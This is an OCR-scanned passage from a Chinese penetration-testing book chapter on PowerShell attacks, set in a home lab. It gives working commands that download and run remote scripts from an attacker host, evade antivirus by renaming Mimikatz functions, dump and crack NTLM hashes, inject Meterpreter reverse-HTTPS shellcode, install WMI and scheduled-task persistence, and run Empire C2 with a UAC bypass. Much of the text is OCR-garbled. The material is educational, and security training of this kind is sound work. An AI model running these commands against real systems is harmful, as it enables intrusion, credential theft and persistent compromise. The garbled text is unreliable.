之 所 以 将 文件 命名 为 Lps1， 是 因为 我 们 想 要 尽量 减少 输入 量 。 使 用 运行 Kali 的 
Web 服 务 左 (本 例 中 王 地 址 是 192.168.1.92) 以 及 tps1 中 的 代码 ， 可 通过 Windows 中 的 
PowerShell 命 令 行 执行 代码 ， 而 不 必 考 虑 使 用 encodedcommand 选 项 : 


F^ 


c:\Users\User\Desktop>powershell -com 
IEX(iwr -UseBasicParsing http://192.168.1.92/t.ps1) 
Username 


DESKTOP-KRB3MSINUser 

这 里 将 两 个 命令 链接 在 一 起 ,以便 从 Kali box 取 出 文件 并 执行 。 这 与 在 本 地 运行 
的 得 出 是 相同 的 ， 在 答 试 执行 脚本 时 ， 不 会 出 现 前 面 看 到 的 任何 错误 消息 。 

可 以 使 用 通用 命名 约定 (Universal Naming Convention，UNCI) 方 式 完 成 同样 的 任 
务 。 在 该 实验 中 ， 这 里 将 设置 为 Samba， 使 Web 目 录 变 得 可 访问 。 但 首先 需要 确保 
在 Kali 中 设置 Samba: 


# apt-get install samba 
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安装 Samba 后 ， 将 下 面 的 代码 深 加 到 /etc/samba/smbd.conf: 


[ghh] 
comment = R/W Share 

browseable = yes 

path = /var/www/html/ 

guest ok = yes 

read only = no 

OTT] 


create mask = 


root@kali:~# service smbd restart 
root@kali:~# smbclient -L localhost 


WARNING: The "syslog" 


option is deprecated 


Enter WORKGROUP\root's password: 


Sharename Type 
prints Disk 
share Disk 
ghh Disk 
IPCS LPC 


Comment 

Printer Drivers 
R/W Share 

R/W Share 


IPC Service (Samba 4.7.0-Debian) 


Reconnecting with SMB1 for workgroup listing. 


Server 


Comment 


RAs In, f&üHsmbclient&]£& -PREZIR MACAK SHS. 


置 共 享 后 ， 可 通过 UNC 路 径 引 用 同一 


个 脚本 。 不 通过 命令 行 ， 不 使 用 任何 命 Ain 


MKA Powershell Ar xF, FEAA Pf: 


C: NUsersNUser»powershell 
Windows PowerShell 


Copyright (C) 2016 Microsoft Corporation. All rights reserved. 
PS C:\Users\User> iex( iwr -usebasicParsing \\192.168.1.92\ghh\t.ps1 ) 


Username 


DESKTOP-KRB3MSIMUsers 


1X HX UNCERTEQIUAEURL) TE Hl SAHARA TTS. RE, aM A n] 
采用 多 种 不 同 的 方法 来 执行 box 中 的 代码 ， 而 不 必 更 改 PowerShell 的 策略 。 
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153 fs*FRjPowerSploitzETT 3798; ch RU Ie 8 718) 2C b 


PowerSploité — LR. 可 帮助 渗透 测试 人 员 创 建立 足 点 ， 并 在 环境 中 逐步 
升级 。 这 些 工 具 也 包含 在 其 他 框架 中 , 如 PowerShell Empire 和 社交 工程 工具 箱 (Social 
Engineering Toolkit, SET). 

这 些 工 具 可 帮助 建立 shell, 在 进程 中 注入 代码 ， 以 及 检测 和 反 制 反 病 毒 软件 等 。 
一 旦 在 环境 中 建立 了 访问 ， 束 可 以 利用 这 些 工 具 逐 步 升 级 ， 并 导出 关键 系统 信息 。 

理解 这 些 工 具 与 其 他 工具 箱 如 何 协同 工作 将 有 助 于 我 们 获取 和 维护 对 环境 的 访 
问 ， 以 及 在 整个 域 中 进行 传播 。 本 节 将 介绍 PowerSploit 侠 件 中 一 些 有 用 的 工具 ， 并 
使 用 这 些 工 具 来 创建 立足 点 ， 同 时 不 会 在 系统 上 留 下 任何 附加 工具 。 


15.3.1 实验 15-5: 设置 PowerSploit 


本 章 前 面 介 绍 了 在 PowerShell 中 运行 脚本 的 不 同方 式 。 本 蔬 需 要 设置 
PowerSploit 以 便 可 以 方便 地 访问 。 由 于 已 经 将 SMB 共 享 映 射 到 Web 根 目录 ， 只 需 p: 
从 GitHub 下 载 PowerSploit 并 进行 设置 。 

首先 克隆 PowerSploit 的 存储 库 。 为 此 ， 需 要 确保 已 经 安装 了 git: 

# apt-get install git 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

git is already the newest version (1:2.14.2-1). 


在 本 例 中 ，git 已 经 存在 ; 如 果 不 存 在 ， 可 江 即 安装 。 接 下 来 进入 Web 根 目录 ， 
并 下 载 PowerSploit: 

root@kali:~# cd /var/www/html 

root@kali:/var/www/html# git clone \ 

https://github.com/PowerShellMafia/PowerSploit.git ps 

Cloning into 'ps'... 

remote: Counting objects: 3075, done. 

remote: Compressing objects: 100$ (4/4), done. 

remote: Total 3075 (delta 1), reused 2 (delta 1), pack-reused 3070 

Receiving objects: 100$ (3075/3075), 10.43 MiB | 5.60 MiB/s, done. 

Resolving deltas: 100% (1799/1799), done. 


敬告: 有些 在 线 教程 要 求 使 用 raw.githubusercontent.com 站 点 ,直接 从 GitHub 
访问 PowerSploit 中 的 文件 以 及 其 他 攻击 代码 。 这 是 十 分 扼 险 的 ， 因 为 测试 
人 员 并 不 了 解 相 应 代码 的 状态 ; 如 果 不 加 以 测试 ， 将 会 破坏 测试 的 目标 。 
在 目标 系统 上 运行 脚本 前 ， 务 必 克 隆 存储 库 并 在 庶 拟 机 上 测试 脚本 。 


输入 过 长 的 URE 是 一 件 无 趣 的 事 , 因此 , 一 般 会 进入 Web 根 目录 , 将 PowerSploit 


325 


326 


SRM RB de Gb DX ou 


存储 库 殉 隆 到 ps 目录 中 。 为 保持 URL 人 简洁 ， 保 证 在 目标 系统 上 正确 输入 ， 将 其 命名 
为 ps 而 非 更 长 的 名 称 。 也 可 浏览 不 同 子 目录 ， 莲 命名 每 个 脚本 ， 但 这 不 实用 。 

通过 cd 命令 进入 ps 目录 时 ， 可 看 到 很 多 文件 和 目标 结构 。 下 面 概述 每 个 目录 中 
的 内 容 : 


root@kali:/var/www/html# cd ps 
root@kali:/var/www/html/ps# ls 


AntivirusBypass Mayhem PowerSploit.pssproj Recon 
CodeExecution Persistence PowerSploit.sln ScriptModification 
Exfiltration PowerSploit.psdl  Privesc Tests 

LICENSE PowerSploit.psml  README.md 


AntivirusBypass 子 目录 包含 的 脚本 有 助 于 确定 反 病 毒 软件 (AV) 会 将 哪些 二 进 制 
文件 确定 为 恶意 软件 。 可 用 此 处 的 脚本 将 一 个 二 进 制 文件 分 成 几 个 部 分 ， 然 后 运行 
反 病 毒 软 件 。 AREE], 由 此 可 确定 需要 对 二 进 制 文件 中 的 哪些 字 市 进行 修改 ， 

CodeExecution 子 目录 包含 可 使 shellcode 进 入 内 存 的 不 同 实 用 工具 。 其 中 一 些 技 
术 包 括 DLL 注入 、 对 进程 的 shellcode 注 入 \ 反射 注入 、 使 用 WMI(CWindows Management 
Instrumentation，Windows 管 理 规 范 ) 的 远程 主机 注入 。 稍 后 将 分 析 这 些 技术 ， 以 便 不 
使 用 文件 即 可 将 Metasploit shellcode 注 入 系统 。 

从 系统 获取 信息 时 ， 最 好 看 一 下 Exfiltration 文 件 夹 。 该 文件 夹 中 的 工具 有 助 于 
复制 锁定 的 文件 ， 从 Mimikatz 获 取 数 据 等 。 需 要 强调 的 其 他 一 些 工 具 包 括 击 键 记录 
fa. Beart LA. Ae tg LAD ee BARS (Volume Shadow Service, VSS) 
辅助 工具 。 这 些 工 具 无 助 于 从 系统 获取 数据 ， 但 有 助 于 生成 值得 进行 渗透 的 数据 。 

ARAS EOS “REIER” (Scorched Earth) Kig, Mayhem H KEEL. 1% 
目录 中 的 脚本 将 使 用 选 定 的 消息 履 关 系统 的 主 局 动 记 录 (Master Boot Record, MBR). 
很 多 情况 下 ， 这 要 求 使 用 备份 还 原 系 统 。 因 此 ， 如 果 目 标 包 含 测 试 人 员 喜 欢 的 信息 ， 

Persistence 目 录 包 含 的 工具 可 帮助 管 理 员 维持 对 系统 的 访问 。 有 很 多 种 持续 访问 


机 制 ， 包 括 注册 表 、VMI 和 调度 任务 。 这 些 工具 可 以 创建 持续 访问 ， 包 括 普 负 用 户 


级 以 及 经 过 权限 提升 的 级 别 ， 这 样 一 来 ， 无 论 需 要 什么 访问 级 别 ， 痢 可 在 目标 系统 
上 方便 地 实现 。 

Privesc 目 孙 包 舍 的 工具 有 助 于 提升 访问 权限 。 既 有 确定 可 攻击 的 “ 弱 权 限 ” 的 
实用 工具 ， 也 有 自动 完成 任务 的 工具 。 稍 后 将 介绍 如 何 使 用 其 中 的 一 些 工具 . 

别 看 Recon 目 录 对 于 攻击 系统 起 不 到 什么 作用 ， 但 这 个 目录 中 包含 的 工具 有 助 
于 更 好 地 理解 当前 环境 。 可 用 其 中 的 工具 方便 地 收集 基本 信息 、 扫 摘 端口 ， 获 得 有 
天 域 、 服 务 器 和 工作 站 的 信息 。 它 们 有 助 于 测试 人 员 确 定 目 标 ， 并 构建 一 个 档案 ， 
列 出 环境 所 含 的 内 容 。 
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15.3.2 ”实验 15-6: 通过 PowerShell 运 行 Mimikatz 


PowerSploit 的 一 个 日 越 功能 是 通过 PowerShell 调 用 Mimikatz。 为 此 ， 必 须 调用 
Privesc 文 件 夹 中 的 Invoke-Mimikatz.ps1 脚 本 ， 如 下 所 示 : 


PF 


PS C:\Users\User> iex (iwr -UseBasicParsing 
http://192.168.1.92/ps/Exfiltration/Invoke-Mimikatz.ps1 ) 


在 运行 时 ， 不 会 弹出 任何 错误 消息 ， 但 几 秒 后 ， 弹 出 了 Windows Defender, f% 
出 已 将 这 个 脚本 标记 为 恶意 软件 。 加 载 脚本 后 答 试 运行 mvoke-Mimikatz 时 ， 它 尚未 
定义 。 为 此 , 必须 做 点 儿 什 么 。 使 用 由 Black Hills Security 完 成 的 一 些 工作 来 绕 过 AV， 
加 载 该 脚本 。 首先 从 Kali 的 Web 根 目录 (varwwwy/htmlypsExfiltratiom 删 除 一 些 空 格 和 
VERE: 


# sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.psl 
# sed -i -e 's/*[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 


现在 返回 Windows box, HAE 


PS C:\Users\User> iex (iwr -UseBasicParsing ' 
http://192.168.1.92/ps/Exfiltration/Invoke-Mimikatz.ps1 ) 
lex : At line:1 char:1 

+ function Invoke-Mimikatz 


This script contains malicious content and has been blocked by your 
antivirus software. 

At line:1 char:1 

+ iex (iwr -UseBasicParsing 
http://192.168.1.92/ps/Exfiltration/Invoke- 


+ CategoryInfo : ParserError: (:) [Invoke-Expression], 
ParseException + FullyQualifiedErrorid : ScriptContainedMaliciousContent, 
Microsoft.PowerShell.Commands.InvokeExpressionCommand 
略 有 进展 ， 但 可 以 看 到 ， 脚 本 还 是 被 阻止 。 因 此 ， 还 需要 做 一 些 更 改 。 在 Kali 

中 ， 更 改 疯 数 名 ， 看 能 合 骗 过 安全 控件 : 
# sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 
# sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.psl1 
此 处 重 命名 主 命令 以 及 一 个 子 命 令 。AV 基 于 函数 名 将 这 个 脚本 标记 为 恶意 软 
件 ， 这 样 必须 绕 过 AV， 下 面试 一 下 : 
PS C:\Users\User> iex (iwr -UseBasicParsing 


http://192.168.1.92/ps/Exfiltration/Invoke-Mimikatz.ps1 ) 
PS C:\Users\User> Invoke-Mimidogz 
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HEUTE - mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 
-#4 ^ ##. "A La Vie, A L'Amour" 
Hit / ON ## /*® * * 
i4 \ / ## Benjamin DELPY ^gentilkiwi' ( benjamin@gentilkiwi.com ) 
'## v ##' http://blog.gentilkiwi.com/mimikatz (ce.e0) 
THEE | with 20 modules * * */ 


mimikatz(powershell) # sekurlsa::logonpasswords 
ERROR kuhl m sekurlsa acquireLSA ; Logon list 


mimikatz(powershell) 4 exit 
Bye! 


脚本 加 载 了 ， 可 以 运行 Invoke-Mimidogz， 但 默认 执行 后 什么 也 得 不 到 。 默 认 做 
法 是 从 内 存 取 出 和 凭证， 当然 ， 这 肯定 会 被 Windows I0EB IE. Ax, MAA MAS 
从 本 地 安全 性 授权 子 系统 服务 (Local Security Authority Subsystem Service，LSASS) 
获取 信息 。 在 运行 Invoke-Mimidogz 时 ， 必 须 使 用 -command 标 过， 告诉 它 转 储 
Isadump::sam: 


PS C:\Users\User> Invoke-Mimidogz -command lsadump::sam 


HEPES 。 mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 
-+# ^ dd. "A La Vie, A L'Amour" 
Ht / \ ## /* * * 
## \ / ## Benjamin DELPY '"gentilkiwi ( benjamin@gentilkiwi.com ) 
'$# v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 
"EF HERE | with 20 modules * * */ 


mimikatz(powershell) # lsadump::sam 

Domain : DESKTOP-KRB3MSI 

SysKey : a34b3d05aec244baf6e9006715bdoboc9' 
ERROR kull m registry OpenAndQueryWithAlloc ; 
kull m registry RegOpenKeyEx KO 

ERROR kuhl m lsadump getUsersAndSamKey ; 

kull m registry RegOpenKeyEx 

SAM Accounts (0x00000005) 


现在 看 到 ， 由 于 测试 人 员 权 限 不 够 高 ， 无 法 获得 LSASS 拥 有 的 文件 ， 因 此 必须 
升级 权限 。 和 圣 运 的 是 ，PowerSploit 有 一 个 工具 允许 测试 人 员 这 人 么 做 。 测 试 人 员 可 以 
使 用 Privesc 目 录 中 的 Get-System.psl 工 具 以 获取 SYSTEM 标 记 来 访问 SAM 文 件 : 

PS C:\Users\User> iex (iwr -UseBasicParsing ' 

http://192.168.1.92/ps/Privesc/Get-System.ps1l ) 

PS C:\Users\User> Get-System 


Running as: WORKGROUP\SYSTEM 
PS C:\Users\User> Invoke-Mimidogz -command lsadump::sam 
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EIiiizrJ mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 
-#4 ^ $4. "A La Vie, A L'Amour" 
ft / \ dH /* * * 
14 \ / ## Benjamin DELPY '"gentilkiwi' ( benjamin@gentilkiwi.com ) 
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe .e0) 
"HHEH" with 20 modules * * */ 


mimikatz(powershell) # lsadump::sam 

Domain : DESKTOP-KRB3MSI 

SysKey : a34b3d05aec244baf6e966/15bd6bo6c9 

Local SID : 5-1-5-21-3929919845-4074983535-3314702914 


SAMKey : cb8862ecafc/19e1cc/2£3309745d0/7a 


RID : 000001f4 (500) 
User : Administrator 


RID : 000003e9 (1001) 

User : User 

LM : 

NTLM : 64fl12cddaa8805/e06a81b54e73b949b 


这 里 从 PowerSploit 的 Privesc 目 录 加 载 GetrSystem.psl 文 件 。 然 后 运行 Get-System 
以 获取 SYSTEM 用 户 的 标记 。SYSTEM 有 权 通 过 LSA 访 问 SAM 文 件 。 此 时 ， 当 运行 
Invoke-Mimidogz 脚 本 并 要 求 转 储 lsadump::sam 时 ， 成 功 了 。 可 看 到 用 户 的 NILM 哈 
希 。 复 制 这 些 信息 ， 移 到 Kalibox， 并 用 John the Ripper 对 其 进行 破解 : 


# echo 64f12cddaa88057e06a81b54e73b949b > creds.txt 

# john --format-NT creds.txtUsing default input encoding: UTF-8 
Rules/masks using ISO-8859-1 

Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3]) 

Press 'q' or Ctrl-C to abort, almost any other key for status 
Passwordl (?) 

1g 0:00:00:00 DONE 2/3 (2017-11-09 17:46) 14.28g/s 53142p/s 
53142c/s 53142C/s woodrow..Secret 

Use the "--show" option todisplayall of the cracked passwords reliably 
Session completed 


针对 creds.txt 文 件 运行 John the Ripper， 可 看 到 User 的 密友 是 Password1l1。 现 在 ， 
己 经 成 功 更 改 了 Invoke-Mimikatz， 使 其 不 再 被 AV 阻 止 ， 继 续 运 行 Get-System 以 获得 
SYSTEM 标 记 ， 从 而 可 以 使 用 Mimikatz 从 LSASS 进 程 转 储 赁 证。 只 使 用 PowerShell 
即 可 完成 这 些 任 务 ， 在 系统 上 没有 留 下 任何 额外 的 二 进 制 文件 。 
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15.333 ”实验 15-7:， 使 用 PowerSploit 创 建 持续 访问 


在 渗透 测 斌 期间， 测试 人 员 需 要 完成 的 一 项 工作 是 创建 供 持续 访问 的 后 门 。 在 
这 个 实验 中 ， 将 分 析 如 何 使 用 PowerSploit 加 载 shellcode， 以 及 如 何 使 用 PowerSploit 
实现 每 次 重启 时 的 持续 访问 。 这 个 过 程 的 第 一 步 是 确保 理解 如 何 使 用 PowerSploit 加 
载 Meterpreter。 

下 面 , 将 使 用 CodeExecution 目 录 中 的 Invoke-Shellcode 模 块 , 还 将 使 用 Metasploit 
设置 Meterpreter 回 调 (callback)。 通过 设置 Metermpreter 回 调处 理 程序 来 完成 进程 的 一 些 
基础 工作 ， 并 将 使 用 reverse_https 载 和 傈 。 诅 载 和 检 因 为 使 用 彰 见 协议 ， 并 从 目标 网 络 的 
内 部 同 测 试 人 员 有 出 回调 ， 一 般 不 会 被 AV 以 及 其 他 安全 控制 功能 检测 到 。 


root@kali:~# msfconsole -q 


msf » use multi/handler 

msf exploit(handler) » set payload 
windows/x64/meterpreter/reverse https 

payload -» windows/x64/meterpreter/reverse https 
msf exploit(handler) » set LHOST 192.168.1.92 
LHOST => 192.168.1.92 

msf exploit (handler) > exploit 


[*] Started reverse HTTPS handler on 192.168.1.92:8443 
[*] Starting the payload handler... 


这 样 就 设置 了 回调 。 现 在 为 其 生成 shellcode。PowerSploit 模 块 使 用 0x00( 而 非 大 
多 数 语言 约定 的 \x00) 格 式 的 shellcode 。 创 建 一 些 shellcode， 然 后 执行 转换 。 使 用 
msfvenom 生 成 载 傈 ， 此 后 再 编写 一 些 脚 本 进行 清理 : 
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse https 
--format c \ 
LHOST-192.168.1.92 | tr -d "\n\";"| sed -e 's/\\x/,0x/g' \ 
| ULP LR LC 
生成 载荷 时 ， 指 定 应 当 使 用 C 格 式 。 由 于 输出 结果 对 测试 人 员 而 言 并 不 合适 ， 
测试 人 员 可 以 使 用 tt 从 输出 中 删除 新 行 、 双 引号 和 分 写 。 接 下 来 ,找到 每 一 处 “\x”， 
将 其 改 为 “,0x”， 这 样 每 个 十 六 进 制 字 符 前 就 有 了 需要 的 分 隔 从 和 0x。 最 后 ， 输 出 
要 有 变量 声明 和 附加 逗 写 ， 因 此 ， 在 第 一 个 命令 上 勇 切 输出 并 取出 其 后 的 内 容 ， 复 
制 这 个 shellcode 并 转 到 Windows box, LA3£388 FAA (rfi FEH n)a I PowerShell. 
JAWeb/lk 45 23 JI s Invoke-Shellcode.ps1 X: fT: 
C:\Users\User>powershell 


Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved. 


PS C:\Users\User> iex ( iwr -UseBasicParsing ` 
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http://192.168.1.92/ps/CodeExecution/Invoke-Shellcode.ps1 ) 
PS C:\Users\User> Invoke-Shellcode -Shellcode <shellcode from 


msfvenom-» 


Injecting shellcode into the running PowerShell process! 

Do you wish to carry out your evil plans? 

[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y 

局 动 PowerShell 并 加 载 Invoke-Shellcode 脚 本 。 加 载 后 ， 使 用 上 一 步 复 制 的 
shellcode 调 用 Invoke-Shellcode。 将 其 粘贴 到 -Shellcode 选 项 后 ， 系 统 会 问 你 是 否 执行 
“邪恶 计划 ”回答 Y( 是 )， 然 后 按 下 Enter 键 。 在 Kali 窗 口中 ， 应 当 看 到 返回 了 连接 ， 
并 打开 Meterpreter 会 话 : 

[*] Started HTTPS reverse handler on https://192.168.1.92:8443 

[*] Starting the payload handler... 

[*] https://192.168.1.92:8443 handling request from 192.168.1.13; 

(UUID: zfnacnas) 

Staging x64 payload (1190467 bytes) 

[*] Meterpreter session 1 opened (192.168.1.92:8443 一 > 

192.168.1.13:51635) at 2017-11-09 21:22:31 -0500 

会 话 司 动 成 功 ， 测 试 人 员 获 得 了 回调 ， 因 此 可 使 用 PowerShell 局 动 Metasploit 
shellcode 来 获得 交互 式 shell。 这 相当 不 错 ， 但 通常 ， 测 试 人 员 需 要 持续 访问 。 因 此 ， 
需要 提出 一 种 新 想法 使 代码 可 徘 地 执行 。 为 此 ， 将 创建 一 个 可 运行 的 命令 ， 并 执行 
shellcode。 为 简便 起 见 ， 首 先 创建 局 动 文 件 ， 该 文件 包含 注入 shellcode 需 要 的 核心 
命令 。 将 以 下 内 容 保 存 到 /Var/www/html/bs.ps1: 

iex(iwr -UseBa http://192.168.1.92/ps/CodeExecution/ 

Invoke-Shellcode.ps1 ) 

Invoke-Shellcode -Force -shellcode <shellcode> 

将 Metasploit 的 shellcode 放 入 <shellcode> 部 分 ， 然 后 保存 文件 。 注 意 ， 可 以 给 
Invoke-Shellcode 添 加 -Force 选 项 ， 这 样 ， 它 就 不 会 问 我 们 是 否 一 定 要 执行 载荷 。 接 
下 来 进入 Windows box, ， 使 用 PowerSploit 中 的 一 个 帮助 函数 实现 持续 访问 。 在 
PowerShell 中 ， 需 要 基于 局 动 文件 创建 脚本 块 : 

Ssb = [ScriptBlock]::Create((New-Object Net.WebClient) 

-downloadString( "http://192.168.1.92/bs.ps1")) 

创建 脚本 块 后 ， 必 须 创 建 持续 访问 。 为 此 ， 使 用 PowerSploit 的 Add-Persistence 
函数 。 首 先 需 要 从 PowerSploit 加 载 代码: 


iex(iwr -UseBasicParsing http://192.168.1.92/ps/Persistence/ 


Persistence.psml) 


为 创建 持续 访问 ， 需 要 执行 几 个 步骤 。 首 先 需 要 确定 持续 访问 的 工作 方式 。 在 
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这 个 示例 中 使 用 了 WMI， 以 免 文件 保留 在 磁盘 上 。 理 想 情况 下 ， 以 SYSTEM 身 份 运 
行 俞 令 ， 以 便 获 得 足够 的 访问 权限 。 还 硕 望 在 局 动 时 运行 ， 这 梓 每 次 系统 重 局 时 ， 
立即 束 能 得 到 回调 。 创 建 了 脚本 块 之 后 ， 我 们 开始 组 痛 持 续 芒 问 选项 : 
PS C:\Users\User> Selev = New-ElevatedPersistenceOption 
-PermanentWMI -AtStartup 
PS C:\Users\User> $user = New-UserPersistenceOption -ScheduledTask 
-OnIdle 
PS C:\Users\User> Add-Persistence -ScriptBlock S$sb 
-ElevatedPersistenceOption' 
Selev -UserPersistenceOption $user -Verbose 
VERBOSE: Persistence script written to C:\Users\User\Persistence.ps1 
VERBOSE: Persistence removal script written to 
C: NUsersNUserNRemovePersistence.psi1 


这 样 就 升级 了 持续 访问 ， 使 其 使 用 WMI 并 在 启动 时 加 载 。 接 下 来 必须 指定 需要 
回调 时 的 用 户 行 为 。 理 想 情况 下 ， 我 们 不 想 露 出 马 脚 ， 因 此 设置 一 个 新 的 持续 访问 
选项 ， 从 而 在 用 户 空 时 创建 一 个 新 会 话 。 最 后 ， 将 这 些 与 Add-Persistence 函 数 结 
合 在 一 起 。 

最 后 运行 持续 访问 脚本 。 不 能 为 此 使 用 iwr， 因 为 这 是 本 地 文件 。 相 反 ， 我 们 将 
使 用 Get-Content applet 获 取 数 据 ， 并 使 用 iex 执 行 它 : 

iex ( Get-Content -Raw .\Persistence.psl ) 


Directory: C:\Users\User\Documents 
Mode LastWriteTime Length Name 


站 二 ee 11/10/2017 5:15 AM WindowsPowerShell 

schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR 

"C:\Windows \System32\WindowsPowerShell\v1.0\powershell.exe 

-NonInteractive" 

现在 ， 为 进行 测试 并 确保 脚本 可 以 工作 ， 必 须 重 局 Windows box。 在 实际 环境 
中 当然 不 想 这 么 做 ， 但 在 我 们 的 虚拟 环境 中 ， 这 是 一 个 不 错 的 测试 ， 可 了 解 工具 的 
工作 方式 。 当 系统 重 局 ， 出 现 Metasploit 控 制 台 时 ， 将 看 到 一 个 shell。 这 里 请 求 创 建 
了 两 尖 持 续 访 问 ， 根 据 用 户 情 况 不 同 ， 每 种 情况 下 访问 方式 都 是 唯一 的 。 以 党 理 员 
号 份 运行 脚本 时 ， 将 使 用 WMI; 当 以 用 户 吴 份 运行 时 ， 由 于 普通 用 户 没 能 力 创 建 
WMI 订 阅 ， 将 运行 一 个 计划 任务 。 


注意 ;如果 在 重启 时 未 看 到 shell， 则 说 明 不 再 拥有 上 一 实验 中 获得 的 已 提 
升 权 限 。 可 以 重新 获得 系统 级 权限 并 写 入 WMI 订 阅 ， 也 可 等 到 User 用 户 空 
闲 时 通过 调度 任务 触发 一 个 新 的 shell。 
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154 使 用 Empire 实现 命令 和 控制 


能 够 运行 各 个 脚本 固然 不 错 ， 但 对 于 实际 攻击 ， 利 用 一 个 综合 性 框架 与 
PowerShell 进 行 远 程 交 互 的 效果 更 好 。 这 正 是 Empire 的 用 武之 地 。Empire 在 一 个 包含 
模块 的 框架 中 提供 PowerSploit 功 能 。 它 采用 一 种 可 定制 的 信 标 (Beaconing) 方 法 ， 以 
更 好 地 隐 基 与 命令 和 控制 (Command and Control，C2) 的 交互 。 本 节 将 在 Empire 中 设 
置 基 本 C2， 升 级 权限 ， 并 添加 持续 访问 。 


15.4.1 实验 15-8: 设置 Empire 


首先 从 GitHub 存 储 库 克隆 Empire， 如 下 所 示 。 文 件 将 在 主 目录 中 执行 ， 而 不 需 
要 从 Web 访 问 这 些 文件 。 


root@kali:~# git clone https://github.com/EmpireProject/Empire.git 

Cloning into 'Empire'... 

remote: Counting objects: 8505, done. 

remote: Compressing objects: 100% (80/80), done. 

remote: Total 8505 (delta 59), reused 52 (delta 26), pack-reused 8399 

Receiving objects: 100$ (8505/8505), 17.90 MiB | 9.42 MiB/s, done. 

Resolving deltas: 100$ (5646/5646), done. 

root@kali:~# cd Empire/ 

现在 进入 Empire 目录 ， 下 一 步 是 确保 安装 了 了 所 有 必 备 软件 。 运 行 Empire 的 安 疼 
HE, ZRNA UEIF: 

root@kali:~/Empire# setup/install.sh 

root@kali:~/Empire# service apache2 stop 

安装 好 之 后 ， 只 需要 输入 empire 即 可 运行 Empire。 首 先 需 要 关闭 Apache， 以 便 
使 用 满口 80 进 行 通信 加 载 Empire 后 ， 可 了 解 一 下 框 染 。 输 入 help 可 浏 贤 各 个 命令 。 


15.4.2 ”实验 15-9: 使 用 Empire 执行 命令 和 控制 


安装 Empire 后 ， 需 要 创建 一 个 侦 听 器 和 一 个 stager。 利 用 stager， 就 可 以 在 目标 
系统 中 执行 C2。 侦 听 器 从 受到 攻击 的 系统 接收 通信 。 测 试 人 员 为 特定 通信 协议 设置 
一 个 特定 的 侦 听 器 。 在 本 例 中 ， 将 使 用 基于 HTTP 的 侦 听 器 ， 以 便 从 C2 返回 的 连接 
看 上 去 是 Web 通 信 。 

HAERA Alt, BEAD ARSE, EPEATTP UT AS. Uta a H 
FEA RIFT ras, OE tm: 


(Empire) > listeners 
(Empire: listeners) > uselistener http 
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(Empire: listeners/http) » execute 
[*] Starting listener 'http' 
[+] Listener successfully started! 


此 时 局 动 侦 听 需 ， 下 一 步 创 建司 动 文件 。 为 此 , ill BSE, 选择 一 个 stager， 
如 下 所 示 : 

(Empire: listeners/http) > back 

(Empire: listeners) > back 

(Empire) > usestager windows/launcher bat 

(Empire: stager/windows/launcher bat) » set Listener http 

(Empire: stager/windows/launcher bat) » generate 

[*] Stager output written out to: /tmp/launcher.bat 

我 们 为 stager 选 择 windows/launcher bat 模 块 。 这 样 ， 便 可 利用 PowerShell 命 令 在 
目标 系统 上 进行 复制 和 粘贴 ， 从 而 启动 C2。 我 们 希望 侦 听 器 能 连接 回 系 统 ， 最 后 生 
成 文件 。 


1543 ”实验 15-10: 使 用 Empire 攻克 系统 


在 这 个 实验 中 , 将 部 署 代 理 (agenb, 执行 升级 , 并 全 面 攻陷 系统 。/tmpy/launcherbat 
文件 有 三 行 代码 ， 本 实验 需要 的 是 第 二 行 (PowerShell 命 令 )。 复 制 这 一 行 并 在 
Windows 主 机 上 执行 它 : 

C:\Users\User> start /b powershell -noP -sta -w 1 -enc 
SQOBmACgAJABOAFMAVgB..... 

iX A Powershell. fEXX Wr, BNA | Cid 388 ^ CCE DU T A 
统 上 ， 命 令 比 这 长 得 多 )。 一 旦 启动 命令 ， 就 可 以 在 Empire 控 制 台 上 看 到 活动 : 

(Empire: stager/windows/launcher bat) > [+] Initial agent 5CXZ94HP from 
192.168.1.13 now active (Slack) 

代理 处 于 活动 状态 后 ， 下 一 步 是 与 代理 交互 ， 如 下 所 示 。 注 意 ， 通 过 名 称 来 指 
定 代理 (本 例 中 是 SCXZ94HP)。 

(Empire: agents) > interact 5CXZ94HP 

(Empire: 5CXZ94HP) > 

目前 正在 与 代理 进行 交互 ， 测 WAR nmi te Sel AA UK Ts(User Account 
Control，UAC) 环 境 ， 升 级 shell。 为 此 ， 运 行 bypassuac 命 令 ， 该 命令 将 自动 生成 一 个 
新 的 已 升级 shell; 

(Empire: 5CXZ94HP) > usemodule privesc/bypassuac 


(Empire: powershell/privesc/bypassuac) » set Listener http 
(Empire: powershell/privesc/bypassuac) » execute 


NE 


第 15 章 PowerShell 漏洞 攻击 


[>] Module is not opsec safe, run? [y/N] y 

(Empire: powershell/privesc/bypassuac) » 

Job started: XGVHZF 

[+] Initial agent 6GECS5UVM from 192.168.1.13 now active (Slack) 


这 样 新 代理 就 升级 了 权限 。 在 Windows box 上 ， 可 能 看 到 一 个 提示 窗口 ， 允 许 
理 权限 访问 一 个 程序 ， 要 根据 目标 系统 上 UAC 的 配置 来 决定 是 否 完全 实现 了 这 


一 目的 。 要 确认 是 人 否 已 经 升级 了 shell 权 限 ， 可 输入 agents， 如 果 看 到 星 写 (*)， 则 表 
示 已 经 提升 了 权限 : 


(Empire: powershell/privesc/bypassuac) > agents 


[*] Active agents: 


Name Lang Internal IP Machine Name Username Process Delay Last Seen 
5CXZ94HP ps 192.168.1.13 DESKTOP-KRB3MSI DESKTOP-KRB3MSIXUserpowershell/6108 5/0.0 2017-11-10 03:04:05 
6GEC5UVM ps 192.168.1.13 DESKTOP-KRB3MSI *DESKTOP-KRB3MSIXUsepowershell/4004 5/0.0 2017-11-10 03:04:09 


模块 


(Empire: agents) > interact 6GEC5UVM 

(Empire: 6GEC5UVM) » usemodule privesc/getsystem* 
(Empire: powershell/privesc/getsystem) » execute 
